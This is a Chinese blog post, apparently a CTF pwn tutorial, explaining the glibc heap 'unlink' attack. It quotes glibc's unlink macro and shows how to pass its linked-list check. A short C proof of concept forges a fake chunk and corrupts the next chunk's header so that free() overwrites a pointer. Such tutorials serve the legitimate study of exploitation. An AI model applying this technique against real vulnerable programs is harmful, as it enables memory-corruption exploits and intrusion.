unlink 发生条件、过程演示 、如何利用

最新推荐文章于 2024-01-10 10:37:45 发布
最新推荐文章于 2024-01-10 10:37:45 发布
阅读量674 收藏 1
点赞数
分类专栏: Hacker之路 文章标签: unlink
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcl2840072208/article/details/96483065
版权

文章目录

发生条件:

unlink是利用glibc malloc 的内存回收机制造成攻击的,核心就在于当两个free的堆块在物理上相邻时,会将他们合并,并将原来free的堆块在原来的链表中解链,加入新的链表中,但这样的合并是有条件的,向前或向后合并。

unlink 源码:

#define bin_at(m, i) \
  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
             - offsetof (struct malloc_chunk, fd))

/* analog of ++bin */
#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))

/* Reminders about list directionality within bins */
#define first(b)     ((b)->fd)
#define last(b)      ((b)->bk)

/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) {                                            \
    FD = P->fd;								      \
    BK = P->bk;								      \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
    else {								      \
        FD->bk = BK;							      \
        BK->fd = FD;							      \
        if (!in_smallbin_range (P->size)&& __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
          if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0) || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
            malloc_printerr (check_action,				      \
                "corrupted double-linked list (not small)",    \
                P, AV);					      \
                if (FD->fd_nextsize == NULL) {				      \
                    if (P->fd_nextsize == P)				      \
                      FD->fd_nextsize = FD->bk_nextsize = FD;		      \
                    else {							      \
                        FD->fd_nextsize = P->fd_nextsize;			      \
                        FD->bk_nextsize = P->bk_nextsize;			      \
                        P->fd_nextsize->bk_nextsize = FD;			      \
                        P->bk_nextsize->fd_nextsize = FD;			      \
                      }							      \
                  } else {							      \
                    P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
                    P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
                  }								      \
          }								      \
      }									      \
}

演示

绕过机制:
unlink 对 FD 和 BK 进行检验

 if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \

为了绕过检查 , 我们使 FD->bk == p , BK->fd == P ,
其中字段修改的含义在
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/heap_structure-zh/#_3
有介绍。

测试代码:

#include <stdio.h>
#include <stdlib.h>

int main(void){
void * p1 , * p2;
p1 = malloc(0x80);
p2 = malloc(0x80);

//fake chunk
//size
*(long long *)((long long)p1+0x8) = 0x81;
//fd
*(long long *)((long long)p1+0x10) = (long long)&p1 - 0x18;
//bk
*(long long *)((long long)p1+0x18) = (long long)&p1 - 0x10;

// next chunk's prev_size 
*(long long *)((long long)p2-0x10) = 0x80;

//set p = 0;
*(long long *)((long long)p2-0x8) = 0x90;

free(p2);
return 0;
}

在这里插入图片描述
未修改堆区源码:
在这里插入图片描述
修改以后堆区:
在这里插入图片描述
free 时 执行unlink ,就修改了 p1 指向的地址。
在这里插入图片描述

heri2
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一道题彻底理解 Pwn Heap Unlink
Ms08067安全实验室
12-20 846
基本原理unlink是一个宏操作,用于将某一个空闲 chunk 从其所处的双向链表中脱链,我们来利用unlink 所造成的漏洞时,其实就是对进行 unlink chunk 进行内存布局,...
malloc源码分析(2)--常用的常量&&变量&&方法
azraelxuemo的博客
03-13 876
文章目录SIZE_SZDEFAULT_MXFASTget_max_fastMALLOC_ALIGN_MASKNBINSNSMALLBINSMIN_LARGE_SIZEin_smallbin_range 在glibc源码学习里面有时候会遇见一些#define ,当我们先大概知道一些会在调试的时候更轻松 [未完待续] SIZE_SZ 这个其实就是用来判断你当前运行环境是32位还是64位的,变化的长度 32位是4 64位是8 #define INTERNAL_SIZE_T size_t #define SIZE_
Linux内存堆的空闲列表结构,ctfwiki笔记--Linux堆相关结构
weixin_32637935的博客
05-06 1053
参考链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/heap_structure-zh/引言:由malloc申请的内存称为chunk。这块内存在ptmalloc内部用malloc_chunk结构体表示。当程序申请的chunk被free后,会被加入到相应的空闲管理列表中。(1)无论一个chunk大小如何,分配还是空闲,都是用一个...
linux软链接和硬链接
归来仍少年
03-10 446
一.ln命令的使用 Usage: ln [OPTION]… [-T] TARGET LINK_NAME (1st form) or: ln [OPTION]… TARGET (2nd form) or: ln [OPTION]… TARGET… DIRECTORY (3rd form) or: ln [OPTION]… -t DIRECTORY TARGET… (4th form) 参数说明 参数 说明 -s, --symbolic 创建
unlink快速入门
abelxu
11-12 3110
0x01 正常unlink 当一个bin从记录bin的双向链表中被取下时,会触发unlink。常见的比如:相邻空闲bin进行合并,malloc_consolidate时。unlink过程如下图所示(来自CTFWIKI)主要包含3个步骤,就是这么简单。 根据p的fd和bk获得双向链表的上一个chunk FD和下一个chunk BK 设置FD->bk=BK 设置BK->fd=FD 下面看一下unlink的源码。 #安装源码 apt install glibc-source #下面目录下有一个
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
Linux unlink函数和删除文件的操作方法
01-09
  对于硬链接来说,unlink 用来删除目录项,并把 inode 引用计数减 1,这两步也是一个原子过程。直到 inode 引用计数为 0,才会真正删除文件。   对于软链接来说,unlink 直接删除软链接,而不影响软链接指向的...
堆漏洞之unlink1
08-04
本文将深入探讨一种名为"unlink1"的堆漏洞利用技巧,以及其在特定环境下的应用。 首先,我们要了解堆内存分配管理的基础。在Linux系统中,glibc库提供了动态内存分配的功能,其中涉及到的主要数据结构是chunk,用于...
node.js中的fs.unlink方法使用说明
10-25
主要介绍了node.js中的fs.unlink方法使用说明,本文介绍了fs.unlink的方法说明、语法、接收参数、使用实例和实现源码,需要的朋友可以参考下
unlink原理及利用
AFCC_的博客(Web_Dog)
02-27 1745
unlink利用glibc malloc 的内存回收机制造成攻击的,核心就在于当两个free的堆块在物理上相邻时,会将他们合并,并将原来free的堆块在原来的链表中解链,加入新的链表中,但这样的合并是有条件的,向前或向后合并。但这里的前和后都是指在物理内存中的位置,而不是fd和bk链表所指向的堆块。 以当前的chunk为基准,将preivous free chunk合并到当前chunk称为向后合...
R语言【base】——unlink():删除文件和目录
最新发布
whitedrogen的博客
01-10 567
unlink() 删除参数【x】指定的文件或目录。 Arguments 参数【x】:包含要删除的文件或目录名称的字符向量。参数【recursive】:逻辑值。应该递归地删除目录吗?参数【force】:逻辑值。是否应该更改权限 (如果可能) 以允许删除文件或目录?参数【expand】:逻辑值。通配符和波浪线是否应该展开?如果参数【recursive】 = FALSE,则不删除目录,甚至不删除空目录。通配符扩展 (通常为 '*' 和 '?' 是允许的) 由 Sys.glob 的内部代码完成。通配符永远不会
linux命令unlink,教你在Linux系统中使用Unlink命令删除文件
weixin_34471172的博客
04-30 2532
在本文中,我们将向你展示如何使用unlink命令删除GNU/Linux系统中的文件,同时要提醒你的是,使用unlink命令要格外小心,因为删除了的文件无法完全恢复。使用unlink删除文件unlink是一个用于删除单个文件的命令行实用程序。unlink命令的语法如下:unlink filename其中filename是要删除的文件的名称,成功时,该命令不会产生任何输出并返回零。unlink命令只接...
堆内存(3)——分配函数_int_malloc
qq_42584874的博客
03-11 1591
_int_malloc __libc_malloc会调用malloc_hook_ini 进行初始化,然后回调__libc_malloc函数,这时候会执行_int_malloc开始分配内存 //堆内存分配入口函数 static void * _int_malloc (mstate av, size_t bytes) { ...... //将内存转换以块为单位,并判断内存大小是否合法 if (!checked_request2size (bytes, &nb)) {
mysql数据库升级-MySQL 5.7.25主备架构小版本In-Place升级思路
oradbm的博客
09-16 1260
一、描述漏扫发现MySQL有低风险漏洞,自己写方案、自己做测试、自己升级。版本:MySQL 5.7.25 升级到MySQL 5.7.28最新版本。架构:主从架构二、升级流程1、下载最新版数据库软件MySQL 5.7.282、上传到指定目录3、备份数据库软件、数据库数据目录、my.cnf4、解压缩数据库软件到指定路径5、关闭备库6、使用新版软件启动备库,mysqld_safe &7、登录备库,发现版本已升级,使用mysql_upgrade命令升级系统数据库。
CTF PWN之heap入门 unlink
L2329794714的博客
09-09 1639
unlink利用需要申请连续的chunk,为了方便我们先要让IO两个缓冲区都申请了,即程序执行至少以此IO输出,一次IO此输入(这里可以让程序执行一遍创建堆块的流程实现),后面再创建两个相邻的堆块,后面一个大小大于0x80,再前一个堆块里伪造一个释放状态的chunk,并利用堆溢出改写后一个chunk的P_size(伪造chunk的大小包括chunk头),和size(in_user为为0),然后free后面的chunk来触发前合并,从而进行unlink。P:为要取出的chunk指针(指向chunk头的)
CHAP7:使用 R 编程进行数据分析
weixin_39999502的博客
09-18 1432
利用R对数据进行处理、分析、可视化、写报告。
如何删除mysql软链接,Linux中移除(删除)符号链接的命令
weixin_36443053的博客
03-27 374
你可能有时需要在 Linux 上创建或者删除符号链接。如果有,你知道该怎样做吗?之前你做过吗?你踩坑没有?如果你踩过坑,那没什么问题。如果还没有,别担心,我们将在这里帮助你。使用 rm 和 unlink 命令就能完成移除(删除)符号链接的操作。什么是符号链接?符号链接(symlink)又称软链接,它是一种特殊的文件类型,在 Linux 中该文件指向另一个文件或者目录。它类似于 Windows 中的...
unlink删除用法(thinkphp5)
蒗若晨曦
05-03 6567
在学习thinkphp5中,上传的附件要用新的代替,需要把旧图删除掉,试了几次unlink()的用法,文件的目录的写法不对,会直接报错,报错信息有很几种:但路径只有一个: // $picurl=SITE_URL.'/public/static'.$article['pic'];//这种写法不行,虽然打印出来的路径可以直接访问到该文件 $p...
unlink pwn
08-25
在计算机安全领域,"unlink"是一种常见的堆溢出攻击利用技术。它利用了"Use-After-Free"漏洞,该漏洞在释放内存后仍然使用该内存的指针。 在具体的实现中,"unlink"攻击需要使用全局变量,并进行多次写入。攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值